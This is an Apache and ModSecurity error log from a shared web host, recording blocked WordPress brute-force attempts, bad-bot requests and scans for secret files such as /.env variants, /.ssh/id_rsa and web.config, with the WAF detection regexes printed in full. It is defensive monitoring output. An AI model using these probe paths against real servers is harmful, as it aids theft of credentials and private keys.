[Tue May 26 14:52:19.036187 2026] [security2:error] [pid 658374:tid 658520] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmSp1Mb7_aby-E0Kcg9gAAABA"]
[Tue May 26 14:52:19.084547 2026] [core:error] [pid 658374:tid 658554] [client 34.73.215.69:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:52:19.084567 2026] [core:error] [pid 658374:tid 658554] [client 34.73.215.69:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:52:19.307437 2026] [core:error] [pid 658374:tid 658559] [client 34.73.215.69:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:52:19.307459 2026] [core:error] [pid 658374:tid 658559] [client 34.73.215.69:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:52:19.424685 2026] [security2:error] [pid 658374:tid 658539] [client 173.239.240.34:64547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVmS51Mb7_aby-E0KchDQAAACM"]
[Tue May 26 14:52:19.703361 2026] [security2:error] [pid 658374:tid 658506] [client 34.73.215.69:52245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.215.73.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVmS51Mb7_aby-E0KchJgAAAAI"]
[Tue May 26 14:52:19.879183 2026] [security2:error] [pid 658374:tid 658602] [client 34.73.215.69:63372] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVmS51Mb7_aby-E0KchMQAAAGI"]
[Tue May 26 14:52:20.020254 2026] [security2:error] [pid 658374:tid 658589] [client 34.73.215.69:60252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchOwAAAFU"]
[Tue May 26 14:52:20.053400 2026] [security2:error] [pid 658374:tid 658537] [client 173.239.240.58:45979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVmS51Mb7_aby-E0KchLQAAACE"]
[Tue May 26 14:52:20.162911 2026] [security2:error] [pid 658374:tid 658616] [client 34.73.215.69:58465] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchPwAAAHA"]
[Tue May 26 14:52:20.334486 2026] [security2:error] [pid 658374:tid 658542] [client 34.73.215.69:53036] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchQAAAACY"]
[Tue May 26 14:52:20.473348 2026] [security2:error] [pid 658374:tid 658556] [client 34.73.215.69:63823] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchSwAAADQ"]
[Tue May 26 14:52:20.611296 2026] [security2:error] [pid 658374:tid 658511] [client 34.73.215.69:59321] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchUQAAAAc"]
[Tue May 26 14:52:20.775047 2026] [security2:error] [pid 658374:tid 658610] [client 34.73.215.69:58026] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchUgAAAGo"]
[Tue May 26 14:52:20.907226 2026] [security2:error] [pid 658374:tid 658558] [client 34.73.215.69:55057] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTJ1Mb7_aby-E0KchVgAAADY"]
[Tue May 26 14:52:21.084588 2026] [security2:error] [pid 658374:tid 658547] [client 34.73.215.69:52159] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "service.google.com.anujtradingco.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVmTZ1Mb7_aby-E0KchYAAAACs"]
[Tue May 26 14:52:21.195044 2026] [security2:error] [pid 658374:tid 658506] [client 185.191.171.15:24302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVmTZ1Mb7_aby-E0KchaAAAAAI"]
[Tue May 26 14:52:21.195200 2026] [security2:error] [pid 658374:tid 658506] [client 185.191.171.15:24302] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVmTZ1Mb7_aby-E0KchaAAAAAI"]
[Tue May 26 14:52:21.428241 2026] [security2:error] [pid 658374:tid 658560] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmTZ1Mb7_aby-E0KchXgAAADg"]
[Tue May 26 14:52:21.626046 2026] [security2:error] [pid 658374:tid 658552] [client 173.239.240.44:37701] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVmS51Mb7_aby-E0KchDgAAADA"]
[Tue May 26 14:52:24.147130 2026] [security2:error] [pid 658374:tid 658512] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmT51Mb7_aby-E0KchogAAAAg"]
[Tue May 26 14:52:26.727930 2026] [security2:error] [pid 658374:tid 658521] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmUp1Mb7_aby-E0Kch-AAAABE"]
[Tue May 26 14:52:26.799716 2026] [autoindex:error] [pid 658374:tid 658606] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:27.157117 2026] [autoindex:error] [pid 658374:tid 658599] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:27.395908 2026] [security2:error] [pid 658374:tid 658614] [client 202.76.169.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmUp1Mb7_aby-E0KciGQAAAG4"]
[Tue May 26 14:52:27.516209 2026] [autoindex:error] [pid 658374:tid 658509] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:27.880365 2026] [autoindex:error] [pid 658374:tid 658571] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:27.929077 2026] [security2:error] [pid 658374:tid 658507] [client 65.21.10.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVmUp1Mb7_aby-E0Kch9QAAAAM"], referer: http://yourstorybag.com/blog/
[Tue May 26 14:52:28.217031 2026] [security2:error] [pid 658374:tid 658516] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmU51Mb7_aby-E0KciOgAAAAw"]
[Tue May 26 14:52:30.850924 2026] [security2:error] [pid 658374:tid 658597] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmVp1Mb7_aby-E0KciwwAAAF0"]
[Tue May 26 14:52:31.075503 2026] [autoindex:error] [pid 658374:tid 658554] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:31.436533 2026] [autoindex:error] [pid 658374:tid 658562] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/rainadelproperties.com/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:52:31.480119 2026] [security2:error] [pid 658374:tid 658550] [client 5.255.99.53:46202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/api/.env"] [unique_id "ahVmV51Mb7_aby-E0Kci_gAAAC4"]
[Tue May 26 14:52:31.548783 2026] [security2:error] [pid 658374:tid 658573] [client 5.255.99.53:46174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env.old"] [unique_id "ahVmV51Mb7_aby-E0KcjCQAAAEU"]
[Tue May 26 14:52:31.766520 2026] [lsapi:warn] [pid 658374:tid 658528] [client 198.235.24.35:58826] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Incorrect key file for table './srsglzts_wp57454/wp4i_options.MYI'; try to repair it for query SELECT option_name, option_value FROM wp4i_options WHERE option_name IN ('_transient_timeout_jetpack_autoloader_plugin_paths') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Shutdown_Handler->__invoke, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Plugins_Handler->cache_plugins, set_transient, wp_prime_option_caches\n
[Tue May 26 14:52:31.988353 2026] [security2:error] [pid 658374:tid 658630] [client 5.255.99.53:46268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env"] [unique_id "ahVmV51Mb7_aby-E0KcjLwAAAH4"]
[Tue May 26 14:52:32.053944 2026] [security2:error] [pid 658374:tid 658523] [client 5.255.99.53:48318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env.backup"] [unique_id "ahVmWJ1Mb7_aby-E0KcjPAAAABM"]
[Tue May 26 14:52:32.302950 2026] [security2:error] [pid 658374:tid 658536] [client 5.255.99.53:46202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.env.bak"] [unique_id "ahVmWJ1Mb7_aby-E0KcjQwAAACA"]
[Tue May 26 14:52:32.369738 2026] [security2:error] [pid 658374:tid 658545] [client 5.255.99.53:46174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/app/.env"] [unique_id "ahVmWJ1Mb7_aby-E0KcjTwAAACk"]
[Tue May 26 14:52:32.371481 2026] [security2:error] [pid 658374:tid 658612] [client 5.255.99.53:46106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVmWJ1Mb7_aby-E0KcjUAAAAGw"]
[Tue May 26 14:52:32.372435 2026] [security2:error] [pid 658374:tid 658612] [client 5.255.99.53:46268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/backend/.env"] [unique_id "ahVmWJ1Mb7_aby-E0KcjUgAAAGw"]
[Tue May 26 14:52:32.374013 2026] [security2:error] [pid 658374:tid 658552] [client 5.255.99.53:46330] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/public/.env"] [unique_id "ahVmWJ1Mb7_aby-E0KcjUwAAADA"]
[Tue May 26 14:52:32.778064 2026] [security2:error] [pid 658374:tid 658505] [client 5.255.99.53:46246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "omshriinfrastructures.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVmWJ1Mb7_aby-E0KcjZQAAAAE"]
[Tue May 26 14:52:33.360841 2026] [security2:error] [pid 658374:tid 658520] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmWJ1Mb7_aby-E0KcjcwAAABA"]
[Tue May 26 14:52:35.484523 2026] [security2:error] [pid 658374:tid 658516] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmW51Mb7_aby-E0Kcj0gAAAAw"]
[Tue May 26 14:52:37.436008 2026] [security2:error] [pid 658374:tid 658621] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmXZ1Mb7_aby-E0KckVwAAAHU"], referer: https://www.anujtradingco.com/
[Tue May 26 14:52:37.778382 2026] [security2:error] [pid 658374:tid 658619] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmXZ1Mb7_aby-E0KckZQAAAHM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430734&moderation-hash=a20bc0fb2911a8e00a99b53c3f34fd6d
[Tue May 26 14:52:37.848750 2026] [security2:error] [pid 658374:tid 658618] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmXZ1Mb7_aby-E0KckWwAAAHI"]
[Tue May 26 14:52:39.943859 2026] [security2:error] [pid 658374:tid 658524] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmX51Mb7_aby-E0KckjgAAABQ"]
[Tue May 26 14:52:41.592230 2026] [security2:error] [pid 658374:tid 658513] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmYZ1Mb7_aby-E0KckuAAAAAk"]
[Tue May 26 14:52:41.783228 2026] [security2:error] [pid 658374:tid 658613] [client 45.148.10.5:49114] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/web.config"] [unique_id "ahVmYZ1Mb7_aby-E0KckyQAAAG0"]
[Tue May 26 14:52:43.035115 2026] [security2:error] [pid 658374:tid 658550] [client 69.48.202.178:64658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVmYp1Mb7_aby-E0Kck4gAAAC4"], referer: https://anujtradingco.com
[Tue May 26 14:52:43.344945 2026] [security2:error] [pid 658374:tid 658597] [client 69.48.202.178:64747] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVmY51Mb7_aby-E0Kck7AAAAF0"], referer: https://anujtradingco.com
[Tue May 26 14:52:44.449232 2026] [security2:error] [pid 658374:tid 658530] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmZJ1Mb7_aby-E0KclCgAAABo"]
[Tue May 26 14:52:46.703749 2026] [security2:error] [pid 658374:tid 658530] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmZp1Mb7_aby-E0KclTgAAABo"]
[Tue May 26 14:52:48.398181 2026] [security2:error] [pid 658374:tid 658527] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmZ51Mb7_aby-E0KclggAAABc"]
[Tue May 26 14:52:51.293666 2026] [security2:error] [pid 658374:tid 658505] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmap1Mb7_aby-E0Kcl1QAAAAE"]
[Tue May 26 14:52:53.470980 2026] [security2:error] [pid 658374:tid 658583] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmbZ1Mb7_aby-E0KcmEgAAAE8"]
